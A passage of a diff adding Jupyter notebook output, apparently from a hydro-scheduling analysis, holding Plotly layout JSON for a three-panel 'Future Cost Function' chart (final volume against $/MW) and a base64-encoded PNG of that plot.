+ "yaxis": "y"
+ }
+ ],
+ "layout": {
+ "autosize": true,
+           "template": "plotly",
+ "title": {
+ "text": "Future Cost Function"
+ },
+ "xaxis": {
+ "anchor": "y",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "xaxis2": {
+ "anchor": "y2",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "xaxis3": {
+ "anchor": "y3",
+ "autorange": true,
+ "domain": [
+ 0,
+ 1
+ ],
+ "range": [
+ 20,
+ 100
+ ],
+ "title": {
+ "text": "Final Volume [hm3]"
+ },
+ "type": "linear"
+ },
+ "yaxis": {
+ "anchor": "x",
+ "autorange": true,
+ "domain": [
+ 0.7333333333333333,
+ 1
+ ],
+ "range": [
+ -686.2822222222221,
+ 16272.962222222222
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ },
+ "yaxis2": {
+ "anchor": "x2",
+ "autorange": true,
+ "domain": [
+ 0.36666666666666664,
+ 0.6333333333333333
+ ],
+ "range": [
+ -654.2066666666667,
+ 12442.326666666666
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ },
+ "yaxis3": {
+ "anchor": "x3",
+ "autorange": true,
+ "domain": [
+ 0,
+ 0.26666666666666666
+ ],
+ "range": [
+ -373.61111111111114,
+ 7098.611111111111
+ ],
+ "title": {
+ "text": "$/MW"
+ },
+ "type": "linear"
+ }
+ }
+ },
+ "image/png": "iVBORw0KGgoAAAANSUhEUgAABcQAAAOECAYAAACPQTLYAAAgAElEQVR4nOzdeXzVdZ7n+7bUttsex75d03V7uu54H9N1p2smZYmWVLlUQWRHEBSKEhElyL4LIkFAhAIBkUUpwJBIBGRHjEBk32QJICQn+06Wkz05AUIgrCHv+wdlisMBBRPOJ+H3ej4er8djgIT8knn/ePz6W/Hk7wQAAAAAAAAAgAP8nfUFAAAAAAAAAADgDxyIAwAAAAAAAAAcgQNxAAAAAAAAAIAjcCAOAAAAAAAAAHAEDsQBAAAAAAAAAI7AgTgAAAAAAAAAwBE4EAcAAAAAAAAAOAIH4gAAAAAAAAAAR+BAHAAAAAAAAADgCByIAwAAAAAAAAAcgQNxAAAAAAAAAIAjcCAOAAAAAAAAAHAEDsQBAAAAAAAAAI7AgTgAAAAAAAAAwBE4EAcAAAAAAAAAOAIH4gAAAAAAAAAAR+BAHAAAAAAAAADgCByIAwAAAAAAAAAcgQNxAAAAAAAAAIAjcCAOAAAAAAAAAHAEDsQBAAAAAAAAAI7AgTgAAAAAAAAAwBE4EAcAAAAAAAAAOAIH4gAAAAAAAAAAR+BAHAAAAAAAAADgCByIAwAAAAAAAAAcgQNxAAAAAAAAAIAjcCAOAAAAAAAAAHAEDsQBAAAAAAAAAI7AgTgAAAAAAAAAwBE4EAcAAAAAAAAAOAIH4gAAAAAAAAAAR+BAHAAAAAAAAADgCByIAwAAAAAAAAAcgQNxAAAAAAAAAIAjcCAOAAAAAAAAAHAEDsQBAAAAAAAAAI7AgfhtaNdjjAICg27aZ6u3WF/ij3blSo0ituxXrxHT9XTHwWrSuq9adx+tcdPDlJrpNruuTdujvvdr/mS7/mbXdq3ishMKCAxSxJb91pcCAAAAAAAA4CY4EL8N7XqMUde+E7X/SMINKyj23NbfN23eCn24cPUdutpbd+lytQaNnauAwCCNfG++Nmw7qF37Y7R41Wa16zFGTVr10dY939b7x72Vz/+7A/Ela7be8Gt+6FhSvV/Xrdi5P1rd+k+q/XXVuQtas2G3st1FJtcDAAAAAAAA4IdxIH4b2vUYoz6jZtbb39d90J/rfCBeXX1FV67U1Onv+CjsCwUEBumrrQd8/qzq3Hn1GDxFv+swSBWnz9bp41zvVj7/7w7EYxLS6/Vj19WcRWu9DsQBAAAAAAAANHwciN+GWz0QD566SO16jPH5/Sat+2rOorWS5PPSH4lp2bf0fkUl5QoIDNKm7VHqM2qmft3yjdrvTM8rLNXI9+brmReGqEnrvnqx9wRt3H7we6/13PmLerJdfw0MnnPTtyks9shdUFr76ytXarR41WY93zNYj7Xso6c6Dtbgd+YqPSu/9m1OVlTq3Znheu6Pb6pJqz5q3mWEJnywuPZQ/Uaf/43c6oG4u6Ck9utyrbAVkQoIDNKFi5ckSZNmLdFLb0zQsbg0des/SU+06afArm/qo7AvvN7veG6hBo2dq6btB+p3HQap3+hZtS8d02vEdJ+XyrnRS6ZkZhdo6LiP9VTHwWrSqo+e7xmssBWRXv8DxvM9gzVt3gqt3rBbbV95W4+36afnewbfke/IBwAAAAAAAJyOA/HbUJ8H4icrKvVku/6aMneZTlZU6nJ19S29n+dEhQICg9Slz7tauHSDYpMydeHiJZ2sqFTzLiPUufd4Rceny11QqpBlG294SHytb12pt/3a13ND1+mxln30+Rfb5S4oVXzycb0yeIqe7jhYnhMVkqQR7/5F7V8do29dqcorLNXh6GS98Po7Ghg8+6af/43U94H41I8+19MdB6vf6FlyF5TqypUarf96nwICg7QnyiVJKj95Wr/vPExvjPxA0fHpSkjJUr/Rs/TMC0PkOVGhyjNV6jd6lrr0eVcnKyp1/sJFnwPxsvJTeuaFIeoxeIpikzKVV1iq5et36Nct3/A6fO8UNF4tu43S5DlLVVF5VhcuXtKE
Dxbr8Tb9VH7y9C3//wkAAAAAAACAH8aB+G1o12OMgt6coapz529YdfUVSbd2IC5JT7br7/WSIbd6kB4QGKQBY2Z7vc2izzcpIDBImdkFXr8/MHi2Orw29qafU+SOQwoIDNLR2NRb+Apc/Y7y37TtrwkfLPb6/Zy8YgUEBilsRaQkqdWfRmn8jE+93qaopFwpGbm1v77+87+R7w7Eo44l3vBrfv7CRUm3dyAeEBik47mFtW9TU1OjJ9r008efrpckfbJsgx5r2cfrJWJKPac08r35io6/ejA/aOxcr5dMuf5AfMFnEfrVc719Xld+zJQQNW0/UJcuX/0fADoFjddzf3yz9teSFJd8XAGBQWavjw4AAAAAAADcrTgQvw3teozxeamPa/vWdfVQ2R8H4guXbvB6m4HBcxTY9U2f9126bpsCAoN04lTlDT+nLbuPKCAwSEdcKbfwFZASUrNv+nrjz3YeqlGTFkqSZi5YpV8911vjZ3yqnfujdfpMlc/b386B+M3qNWK6pNs7EP9N2/4+H6fZS8M1ec5SSVcPu194/Z3vva4fOhAfGDxHrbuP9nm/lRG7vA7kOwWN93m5mix3kQICg7Rl95HvvQYAAAAAAAAAt4cD8dvQrscY/WnAJMUkpN+wyr8e+vrjQHzFlzu93qbn0PcVEBikJq37evVYyz4KCAzyen3va8UkZCggMEhrNuy+pa/BoWNJXi8vcq32rwZ7fef6xu0H1eetmWrSuq8ebdFbg8bOVW5+yU0//xv57kB89YbdN/yaf/d53c6B+DOdhvh8nGYvDdfk2UskXf1a/tAPzPyhA/GeQ9/XH/u95/N+kTuvfkd+fPJxSVcPxN+cON/rbb47EN+8iwNxAAAAAAAAoD5xIH4bbvk1xN/3Pdi+dLlav3qu9/cfiN/C+93sQHzwO3PVuvtoZbmLbth3B8LXu3S5Wk93HKyeQ9+/6edTVHpCC5d8pTNnzykxLfumrzn+zAtDNPrPn/j8/vkLF7UnyqUOr41Vq5ffUk1NzQ0//xu59dcQL73hgfhfwr+87QPxgcFz1OpPo7734/3QgfigsXPV6uW3fN5vxZc7FBAYpGx3kSQOxAEAAAAAAAB/4kD8Ntzqgfi0ecv1bOehXr/33UuNXH8gPnPBqtt6v5sdiIetiFSTVn1qf6jld0o9p1RReVbfZ+GSrxQQGKTw1Zt9/uxs1Xm9Nmyanu08VCdOVerCxUtq2n6A3pkW5vV2mdkFCggM0tJ123Tm7Dl9veuw12twS9KGbQcVEBhU+8Mir//8b+RWD8QrTp9VQGCQVkbs8vr9gcFzbvtAfOHSDQoIDJK74G/fzV5x+qy69p2orXu+lXT1wPva7wC//kD8u9d0dxeUen2cke/N1zMvDKl9vXkOxAEAAAAAAAD/4UD8Ntzqgfh3P6hy655vVVNTo5y8YvUbPUtN2w/wOhBv2W2Ueg59X6mZbp2sqLyl97vZgfjJiko17zJCPYe+r5iEdBUWe7T7oEutu4/WqEkLvvd6L1dXa/i78xQQGKSBwbMVsWW/dh+I0eJVm9X2lbf1VMfBOhyTXPv288Mj9OuWb2j5+h3KLypTTEK6uvWfpMCub6qi8qzOnb+oP7w4TP3fnqWYhIy/vk2Geg59X516jbvp538jt3ogLkntXx2jV4dMVcXpszp/4aJWb9itVn8addsH4mXlp/R0x8Hq1n+Soo4lypWYof5vz9KznYeqrPyUJGnstFA91XGw4pOPK7+ozOdAvPzkaT3beaheGTxF8cnH5S4oUfjqzXq0RW99uvLr2o/LgTgAAAAAAADgPxyI34ZbPRCvrr6i6X9ZoeZdRug3bfvrlcFTlJCSpTbdR3u9RMjajXv02+cH6plOQ7T/SPwtvd/NDsQlKa+wVKMmLdAzLwxRk1Z91Kb7aM1ZtPamL5dyrZqaGm3cflC9R87Q7zsP0+Nt+qn9q2M0bd5yFRR7fN72s9Vb1P7VYD3Wso+eeWGIRk1aoLzC
v3039PGcAg2bME9/eHGYmrTqo+f++KbemRamopLym37+N3I7B+Jxycf18oDJ+k3b/mreZYRmhazRl5v3KSAwSFXnzku6tQNxScrIztfA4Nlq2n6AftdhkPq/Pcvrddjjk4+rZbdRatp+gOaHR/gciEtXD7aHjvtYv31+oB5r2Uedeo3Tqq+8v4OdA3EAAAAAAADAfzgQBwAAAAAAAAA4AgfiAAAAAAAAAABH4EAcAAAAAAAAAOAIHIgDAAAAAAAAAByBA3EAAAAAAAAAgCNwIA4AAAAAAAAAcAQOxAEAAAAAAAAAjsCBOAAAAAAAAADAETgQBwAAAAAAAAA4AgfiAAAAAAAAAABH4EAcAAAAAAAAAOAIHIgDAAAAAAAAAByBA3EAAAAAAAAAgCNwIA4AAAAAAAAAcAQOxAEAAAAAAAAAjsCBOAAAAAAAAADAETgQBwAAAAAAAAA4AgfiAAAAAAAAAABH4EAcAAAAAAAAAOAIHIgDAAAAAAAAAByBA3EAAAAAAAAAgCNwIA4AAAAAAAAAcAQOxAEAAAAAAAAAjsCBOAAAAAAAAADAETgQBwAAAAAAAAA4AgfiAAAAAAAAAABH4EAcAAAAAAAAAOAIHIgDAAAAAAAAAByBA3EAAAAAAAAAgCNwIA4AAAAAAAAAcAQOxAEAAAAAAAAAjsCBOAAAAAAAAADAETgQBwAAAAAAAAA4AgfiAAAAAAAAAABH4EAcAAAAAAAAAOAIHIgDAAAAAAAAAByBA3EAAAAAAAAAgCNwIA4AAAAAAAAAcAQOxAEAAAAAAAAAjsCBOAAAAAAAAADAETgQBwAAAAAAAAA4AgfiAAAAAAAAAABH4EAcAAAAAAAAAOAIHIgDAAAAAAAAAByBA3EAAAAAAAAAgCNwIA4AAAAAAAAAcAQOxAEAAAAAAAAAjsCBOAAAAAAAAADAETgQBwAAAAAAAAA4AgfiAAAAAAAAAABH4EC8jgrLzxH5vcqqS6o8d9n8Osh5sT2yiu2RVWyPrGJ7ZBXbI6vYHlkGZ+FAvI6sb1hyZjwokFVsj6xie2QV2yOr2B5ZxfbIKrZHlsFZOBCvI+sblpwZDwpkFdsjq9geWcX2yCq2R1axPbKK7ZFlcBYOxOvI+oYlZ8aDAlnF9sgqtkdWsT2yiu2RVWyPrGJ7ZBmchQPxOrK+YcmZ8aBAVrE9sortkVVsj6xie2QV2yOr2B5ZBmfhQLyOrG9YcmY8KJBVbI+sYntkFdsjq9geWcX2yCq2R5bBWTgQryPrG5acGQ8KZBXbI6vYHlnF9sgqtkdWsT2yiu2RZXAWDsTryPqGJWfGgwJZxfbIKrZHVrE9sortkVVsj6xie2QZnIUD8To6VFJqftOS8+JBgaxie2QV2yOr2B5ZxfbIKrZHVrE9sgzOwoF4Hf1jTJj+xRWuTilb9GFunI6WeMxvYrr740GBrGJ7ZBXbI6vYHlnF9sgqtkdWsT2yDM7iyAPxE6cq1f/tWeoUNN7r97sP+rOatOqjJq37qknrvmr20nBJUmqmW+16jLnh3/XzuGX6u+hPvPqfcSv0atpOhealKLmswvymprsvHhTIKrZHVrE9sortkVVsj6xie2QV2yPL8DeLPt+ktq+8rWc7D1XzLiM0ec5SXbh4SZLkLihRTEK6X67jcnW1ZoWsUUBgkE5WVNbr3+24A/GzVefVqdc4zQ5Z63Mg3uG1scrMLvB5n+87EC8sP6eDJSWakROrDimb9c+uxV6H4/dEf6JH49doUMY+rSw4rixPpflNTo0/HhTIKrZHVrE9sortkVVsj6xie2QV2yPLcFXkzkPq2neiyspPSZJOVlTq9eHTNGfRWknS0nXbFLYi0i/XMmz8x1rwWYQebdGbA/G6qjp3vvZ/zbj+QLx5lxEqLjvh8z7XHohfulytXiOma/GqzZJ8f6hmfnmVthTla0LWUTVL+kr/EB3qdUB+f8wiPZ0YoeCsI9pUmKu88irzm54aXzwokFVsj6xie2QV
2yOr2B5ZxfbIKrZHluGqeYvXa9KsJV6/d+JUpU5VnNHhmGQ988IQNXtpuOaGrlNNTY1mzF+pNt1Hq9XLb2nc9DBdrq6WJBUUe9Rj8BS16zFG42d8qlGTFipiy35J0jeH4vRi7wnq8NpYDQyeXXv4fr3UTLckcSBen250IP54m34a8e5f9IcXh6lz7/H65lCcJO8D8clzlmrih+G171N88vz35j5xVl8UZWt45kE9kbBO90aHeB2QPxTzqdqmROr9XJf2lRb/4N9HVHzyvM6cu6wz5y+bXwc5L7ZHVrE9sortkVVsj6xie2QV2yPLrCSm1GjDlmq/l5VTc8PrSUjJ0pPt+mtu6DrFJR+vPeD+ztSPPq/9DvE9US516jVOFy5e0sWLl/TSGxO0edcRSdJbkxdqbug6SdLh6GQ1ad1Xm7ZHyXOiQk91HKyM7HxJ0pI1WzX83Xnf+zXiQLweXX8gfuVKjcbP+FR7oly6dLlae6Jcatp+gIpKT9QeiK/ZsFt9Rs30GsOVKzW31clLF/TlyWwNyd2nXyau8nn98f8ev1Q9s3ZqiSdN+RfO3PbfT86opqZGNTW3vz+iusb2yCq2R1axPbKK7ZFVbI+sYntkmZU1EdXqO+KS39ux58pNryk9K1/vzgxXy26j1LT9QE34YLFOVZyR5H0gXlNTo6pzf/sfEybNWqLQ5ZskXX0VjrTjebV/1uG1sdq0PUobth3UgDGza3+/6tx5/brlG6quvvn1cCBej270HeLXe2PkB4rccUipmW492a6/fvv8QAW/v8jrber6n2S4Ssv1cW6iuqZu089il/gckP8iboV6p+9ReF6a0spOm/8nJNQw4j8lI6vYHlnF9sgqtkdWsT2yiu2RVWyPLLPS0L5D/HpZ7iINHfdx7SH2tQfiJ05Vatz0MHUfOFndB/1ZzV4arpBlGyVJj7Xs4/Wy1H1Hf6hN26P02eoterJdf7V6+a3anuo4WJ4TFTe9Bg7E69H1B+JV5y4oNinT621eHz5N2/YeVWqmW890GqKiknK1fzVYO/dH175Nfd+Ae4uLNTUnRm2TI/VQTJjX4fi90SF6PGGdhmUe0LqCbOWUnzH/B4Ns4kGBrGJ7ZBXbI6vYHlnF9sgqtkdWsT2yDFftiXL5vKZ3XPJxNe8yQpL3gfikWUs0bnpY7Xd3vzszvPZA/NnOQ5WZXVD7d3R8/R1t2h6lTdujNGz8x7d1TRyI16PrD8RPn6lS0/YDdODbBEnSgW8T9HTHwSo/edrrNcRjEjLUvMsInTh19f8j7uTNmFdepU2FuQrOOqKnEyN0f8wirwPyB6JD1SzpK03IOqotRfnK5wd0OiYeFMgqtkdWsT2yiu2RVWyPrGJ7ZBXbI8tw1dhpoRoy7qPaQ/HTZ6o0bnqYRr43X5I0Y/5KzVm0VpL05sT5WrJmq6SrP3+xTffRtX82MHiOFi7dIEnadzhOT7TpV/sa4r/vPEy5+SWSpITUbE2bt/x7r4kD8Xqwc3+0mrTuqyat+iggMEhNWvfVS29MkCTtP5KgTkHj9bsOg9S170QdcaVI8v6hmpL0wYJVenPi1SH48+bM8lRqZcFxDcrYp0fj1+ie615e5WHXYnVI2awZObE6WFJi/o8J3bl4UCCr2B5ZxfbIKrZHVrE9sortkVVsjyzDVefOX9S0ecvVottIPdVxsFp0G6n3Zn2mitNnJUlRxxLVtP1AjZkSIldihtr1GKMXXn9H46aHadf+GD3VcbD2RLmUkZ2vF3tPUPtXgzV5zlINGfeRIncckiR9cyhOL/aeoHY9xqhr34mKSUj3uY5TFWeunt+27lt7ftukdd/vfWmV2+G4A/H6ZnmzJpdVaFFesnqm7dIjsct9Xn/853HL1D11hxa4k5VQdtL8Hxeqv3hQIKvYHlnF9sgqtkdWsT2yiu2RVWyPLEP9u/aHlfYaMV37DscZXo03DsTryPqGvbajJR7Nzo1X55St+qkr3OeA/Jfxq9Qv/Rsty89Q
hocf0NmY40GBrGJ7ZBXbI6vYHlnF9sgqtkdWsT2yDPXrw4WrNWZKiGpqapTtLtLvOgyqt+/urg8ciNeR9Q17swrKz2lncaHeyz6qFkkb9eB1P6DzvugQNU1Yr1GZUYoozJHbc9b8munW40GBrGJ7ZBXbI6vYHlnF9sgqtkdWsT2yDPXLc6JCfd6aqRbdRqr9q2MUufOQ9SV54UC8jqxv2FvN7TmriMJsjcqMUtOE9bovOsTrgPzBmDC1SNqoSdnHtLO4UAUN4Jrp5vGgQFaxPbKK7ZFVbI+sYntkFdsjq9geWQZn4UC8jqxv2B9bhue0luVnqG/6Xv1n/Eqfl1f5qStcnVO2anZuvI6WeMyvl7zjQYGsYntkFdsjq9geWcX2yCq2R1axPbIMzsKBeB1Z37D1VXzZSS1wJ6l76g79e+wynwPyR2KXq2faLoXmpSi5rML8ep0eDwpkFdsjq9geWcX2yCq2R1axPbKK7ZFlcBYOxOvI+oa9Ux0oKdaMnFg9n/K1HnYt9jocvyf6Ez0av0aDMvZpZcFxZXkqza/XafGgQFaxPbKK7ZFVbI+sYntkFdsjq9geWQZn4UC8jqxvWH+UX16lLUX5Gp/1rf6QFKEHokO9Dsjvj1mkpxMjFJx1RJsKc5VXXmV+zXd7PCiQVWyPrGJ7ZBXbI6vYHlnF9sgqtkeWwVk4EK8j6xvWopzyM1pbkKWhmfvVJGGtfnLdy6s8FBOmtsmRmpoTo73FxebXezfGgwJZxfbIKrZHVrE9sortkVVsj6xie2QZnIUD8TqyvmEbQmllpxWel6ag9N36j7gVPq8//rPYJeqauk0f5ybKVVpufr13QzwokFVsj6xie2QV2yOr2B5ZxfbIKrZHlsFZOBCvI+sbtiHmKi3XR+4EdUndqn91feZzQP6LuBXqnb5H4XlpSis7bX69jTEeFMgqtkdWsT2yiu2RVWyPrGJ7ZBXbI8vwN4s+36S2r7ytZzsPVfMuIzR5zlJduHhJkuQuKFFMQrpfrmP3gRh1eG2sfvv8QL027H1luYvq7e/mQLyOrG/YxtDe4iJNyYlWm+RNeigmzOtw/N7oED2esE7DMg9oXUG2csrPmF9vY4gHBbKK7ZFVbI+sYntkFdsjq9geWcX2yDJcFbnzkLr2naiy8lOSpJMVlXp9+DTNWbRWkrR03TaFrYi849dRUnZSv+swSLFJmbpypUYff7pevUfOqLe/nwPxOrK+YRtbeeVV2lSYqzFZh/VU4pe6P2aR1wH5A9Ghapb0lSZkHdWWonzl8wM6bxgPCmQV2yOr2B5ZxfbIKrZHVrE9sortkWW4at7i9Zo0a4nX7504ValTFWd0OCZZz7wwRM1eGq65oetUU1OjGfNXqk330Wr18lsaNz1Ml6urJUkFxR71GDxF7XqM0fgZn2rUpIWK2LJfkvTNoTi92HuCOrw2VgODZ9cevl+rpOykduw7VvvrlIxcteg2st4+Tw7E68j6hm3sHfdUamVBpgZm7NOv4lfrnuteXuVh12J1SNmsGTmxOlhSYn69DSUeFMgqtkdWsT2yiu2RVWyPrGJ7ZBXbI8usXI49ovNrF/u96vSkG15PQkqWnmzXX3ND1yku+XjtAfd3pn70ee13iO+JcqlTr3G6cPGSLl68pJfemKDNu45Ikt6avFBzQ9dJkg5HJ6tJ677atD1KnhMVeqrjYGVk50uSlqzZquHvzvvBr9PiVZs1ZkrIj/46X48D8TqyvmHvtpJKTykkL1mvpu3UI7Gf+7z++M/jlql76g4tcCcroeyk+fVaxYMCWcX2yCq2R1axPbKK7ZFVbI+sYntkmZVzS+fp1J9+7/cuRK656TWlZ+Xr3ZnhatltlJq2H6gJHyzWqYozkrwPxGtqalR17nzt+02atUShyzdJkpp3GaG043m1f9bhtbHatD1KG7Yd1IAxs2t/v+rcef265Ruqrr5y0+s58G2C2r7ytko9vt9J/mNxIF5H1jfs3d7h0lLNyo1T
p5Qt+hdXuM8B+S/jV6lf+jdalp+hDI9zfkAnDwpkFdsjq9geWcX2yCq2R1axPbKK7ZFlVhrad4hfL8tdpKHjPq49xL72QPzEqUqNmx6m7gMnq/ugP6vZS8MVsmyjJOmxln1UXHai9u/pO/pDbdoepc9Wb9GT7fqr1ctv1fZUx8HynKi44ceP3HlIHV4bK3dBSV2+zD44EK8j6xvWSRWUn9OO4gJNzD6m55I26B+v+wGd90WHqGnCeo3KjFJEYY7cnrPm13yn4kGBrGJ7ZBXbI6vYHlnF9sgqtkdWsT2yDFftiXL5vKZ3XPJxNe8yQpL3gfikWUs0bnpY7Xd3vzszvPZA/NnOQ5WZXVD7d3R8/R1t2h6lTdujNGz8x7d0LbsPxOjF3hNuelheFxyI15H1Devk3J6z+rIwWyMzD+rJxC90X3SI1wH5gzFhapG0UZOyj2lncaEKGsA111c8KJBVbI+sYntkFdsjq9geWcX2yCq2R5bhqrHTQjVk3Ee1h+Knz1Rp3PQwjXxvviRpxvyVmrNorSTpzYnztWTNVklSaqZbbbqPrv2zgcFztHDpBknSvsNxeqJNv9rXEP9952HKzb/6Hd8JqdmaNm+5z3VUVJ5Vi24jlV9Udkc+Tw7E68j6hqW/leE5raX56eqTvlf/Gb/S5+VVfuoKV+eUrZqdG6+jJR7z661LPCiQVWyPrGJ7ZBXbI6vYHlnF9sgqtkeW4apz5y9q2rzlatFtpJ7qOFgtuo3Ue7M+U8Xps5KkqGOJatp+oMZMCZErMUPteozRC6+/o3HTw7Rrf4ye6jhYe6JcysjO14u9J6j9q8GaPGephoz7SJE7DkmSvjkUpxd7T1C7HmPUte9ExSSk+1xHxJb9CggMUpPWfb367rXM64oD8TqyvmHp5sWXndR8d5JeTtuu/x671OeA/JHY5eqZtkuheSlKLqswv97biQcFsortkVVsj6xie2QV2yOr2B5ZxfbIMtS/K1dqarPYYs8AACAASURBVP/fvUZM177DcYZX440D8TqyvmHp1ttfXKLpOS61T/la/9X1qdfh+D3Rn+jR+DUalLFPKwuOK8tTaX693xcPCmQV2yOr2B5ZxfbIKrZHVrE9sortkWWoXx8uXK0xU0JUU1OjbHeRftdh0B15LfAfiwPxOrK+YenHlV9epS1FeRqX9a3+kBShB6JDvQ7I749ZpKcTIxScdUSbCnOVV15lfs3XxoMCWcX2yCq2R1axPbKK7ZFVbI+sYntkGeqX50SF+rw1Uy26jVT7V8cocuch60vywoF4HVnfsFQ/ZZef0Zr8LA3N3K8mCWv1k+teXuWhmDC1TY7U1JwY7S0uNr9eHhTIKrZHVrE9sortkVVsj6xie2QV2yPL4CwciNeR9Q1Ld6bUsgotzktVr/Td+o+4FT6vP/6z2CXqmrpNH+cmylVa7vfr40GBrGJ7ZBXbI6vYHlnF9sgqtkdWsT2yDM7CgXgdWd+w5J+iSz2a605Ql9St+lfXZz4H5L+IW6He6XsUnpemtLLTd/x6eFAgq9geWcX2yCq2R1axPbKK7ZFVbI8sg7NwIF5H1jcs2bSnqEhTcqLVOnmT/ktMmNfh+L3RIXo8YZ2GZR7QuoJs5ZSfqfePz4MCWcX2yCq2R1axPbKK7ZFVbI+sYntkGZyFA/E6sr5hyb688iptLMrV21mH9VTil7ovZpHXAfkD0aFqlvSVJmQd1ZaifOXXww/o5EGBrGJ7ZBXbI6vYHlnF9sgqtkdWsT2yDM7CgXgdWd+w1PA67qnUivxMDczYp4D41brnupdXedi1WB1SNmtGTqwOlpT8qI/BgwJZxfbIKrZHVrE9sortkVVsj6xie2QZnIUD8TqyvmGp4ZdUekohecnqkbZT/yPuc5/XH/953DJ1T92hBe5kJZSdvKW/kwcFsortkVVsj6xie2QV2yOr2B5ZxfbIMjgLB+J1ZH3DUuPrcEmpPsyN0wspW/QvrnCfA/Jfxq9Sv/RvtCw/
QxmeG/+ATh4UyCq2R1axPbKK7ZFVbI+sYntkFdsjy/A3iz7fpLavvK1nOw9V8y4jNHnOUl24eEmS5C4oUUxCul+uY+P2g2r7ytv67fMD9frwacrJK663v5sD8TqyvmGpcVdQfk7biwo0MfuYnkvaoH+87gd03hcdoqYJ6zUqM0oRhTlye86qsJwHBbKL7ZFVbI+sYntkFdsjq9geWcX2yDJcFbnzkLr2naiy8lOSpJMVlXp9+DTNWbRWkrR03TaFrYi849eR5S7SM52GKD0rX9XVVzQrZI3eGPlBvf39HIjXkfUNS3dXuZ6z+rIwW29mHtRvEr/QvdEhXgfkD8aEqUXSRk3Pd+nQqVIVNIBrJmfFQypZxfbIKrZHVrE9sortkVVsjyzDVfMWr9ekWUu8fu/EqUqdqjijwzHJeuaFIWr20nDNDV2nmpoazZi/Um26j1arl9/SuOlhulxdLUkqKPaox+ApatdjjMbP+FSjJi1UxJb9kqRvDsXpxd4T1OG1sRoYPLv28P1aBcUe7T+SUPvr+OTjavWnUfX2eXIgXkfWNyzd3aV7KrUkL1190vfqP+NX+ry8yk9d4eqcslWzc+N1tMRjfr1098dDKlnF9sgqtkdWsT2yiu2RVWyPLLOy7XSeJhUe9XuHz5bc8HoSUrL0ZLv+mhu6TnHJx2sPuL8z9aPPa79DfE+US516jdOFi5d08eIlvfTGBG3edUSS9NbkhZobuk6SdDg6WU1a99Wm7VHynKjQUx0HKyM7X5K0ZM1WDX933vd+jSrPVGn8jE81Ze6yOn2tr8WBeB1Z37DkrOLLTmq+O0mvZu7Uv8ct9TkgfyR2uXqm7VJoXoqSyyrMr5fuvnhIJavYHlnF9sgqtkdWsT2yiu2RZVZG5R30OdvxR3NL4m56TelZ+Xp3Zrhadhulpu0HasIHi3Wq4owk7wPxmpoaVZ07X/t+k2YtUejyTZKk5l1GKO14Xu2fdXhtrDZtj9KGbQc1YMzs2t+vOndev275hqqrr9zwWj78ZLUCAoPUc+j7tddQHzgQryPrG5ac2XcPCvuLSzQtx6X2KV/rv7o+9frH7Z7oT/Ro/BoNytinlQXHleWpNL9uavzxkEpWsT2yiu2RVWyPrGJ7ZBXbI8usNLTvEL9elrtIQ8d9XHuIfe2B+IlTlRo3PUzdB05W90F/VrOXhitk2UZJ0mMt+6i47ETt39N39IfatD1Kn63eoifb9Verl9+q7amOg+U5UXHTazh3/qKWrNmql96YoJqamh/7pfbCgXgdWd+w5Mxu9KCQX16lzYV5eif7W/0+KUJ/H73I64D8/phFejoxQsFZRxRZ6FZeeZX550GNLx5SySq2R1axPbKK7ZFVbI+sYntkGa7aE+XyeU3vuOTjat5lhCTvA/FJs5Zo3PSw2u/ufndmeO2B+LOdhyozu6D27+j4+jvatD1Km7ZHadj4j3/wOlIz3Tock1z76ytXavRoi97fe3B+OzgQryPrG5ac2a08KGSXn9Ga/CwNydyvxxLW6ifX/ecxD8WEqW1ypKbmxGhvcbH550SNIx5SySq2R1axPbKK7ZFVbI+sYntkGa4aOy1UQ8Z9VHsofvpMlcZND9PI9+ZLkmbMX6k5i9ZKkt6cOF9L1myVdPUAu0330bV/NjB4jhYu3SBJ2nc4Tk+06Vf7GuK/7zxMuflXv0M9ITVb0+Yt97mOA98m6Lk/vqm8wlJJ0ldbD6jZS8N15QrfId4gWN+w5Mx+zINCalmFPnWn6vX03fqfcSt8Xj/qZ7FL1DV1mz7OTZSrtNz8c6SGGQ+pZBXbI6vYHlnF9sgqtkdWsT2yDFedO39R0+YtV4tuI/VUx8Fq0W2k3pv1mSpOn5UkRR1LVNP2AzVmSohciRlq12OMXnj9HY2bHqZd+2P0VMfB2hPlUkZ2vl7sPUHtXw3W5DlLNWTcR4rccUiS9M2hOL3Ye4La9Rijrn0nKiYh/YbXEr56s1r9aZSe6jhYfxowSa7E
VSWPTKnWuLdu3M6WFH8e9//3QUdFY/fLP3/l2h1Va9y7Kl7Kb5abl6+363bR4RMZkqTDJzL07/rdFQznVniG+JmMa6rWuLdCkZgkDsRhgxsFWHHV9pw8+U6clLNioYJDuirc/Innj7eooeDIVDnfLJf37AWeP17JXLU9vFTYHqywPVhhe7DC9mCJ3FWVHIhPmfeNGrQdqolzVqv6p300buaK8s/9fOOumnUdo9HTl1XFS/nd0o9nqEG7YfpnvW76tNNIHT97RVLFP1RTiv9++oycK4kDcdjgRgFW3Lw9T05IvoMH5CyYoWDvxOePh9vXVWDSUDlbNsr7803z1/u6cfP2YIvtwQrbgxW2BytsD5bIXVXJgXhJaalWbdqt4VOWaOXGXSou+fUPpewy8HP1Gz1PefdfzfFZX7BwJ24UYIXt/cpz2yP/9q0KzBijUEri88fD3f4nZ/YE+XfvkCfLb/56X3VsD1bYHqywPVhhe7DC9mCJ3FWVHIj/XqWlD61fQlJZX7BwJ24UYIXt/Tbvpavyb1qr4PgBCrepmXBAHurfTs6i2fId/kkeL88ff15sD1bYHqywPVhhe7DC9mCJ3JX5gfirnvUFC3fiRgFW2N4zcvLkO3lazsrFCg7tlvj88ebvKziih5zVX8t75rxynPv2r/klx/Zghe3BCtuDFbYHK2wPlshdcSCeZNYXLNyJGwVYYXt/jscTlv/QITlfzlCwT6vEx6u0q6PApMFyNm+QN/O6+et9GbE9WGF7sML2YIXtwQrbgyVyVxyIJ5n1BQt34kYBVtjei+G545VvxzYFZoxVqMsniQfkXRsrMGu8/Du3y3PHZ/56XwZsD1bYHqywPVhhe7DC9mCJ3BUH4klmfcHCnbhRgBW2Vzm8lx89f3zCQIXb1k58/ni/NnIWzp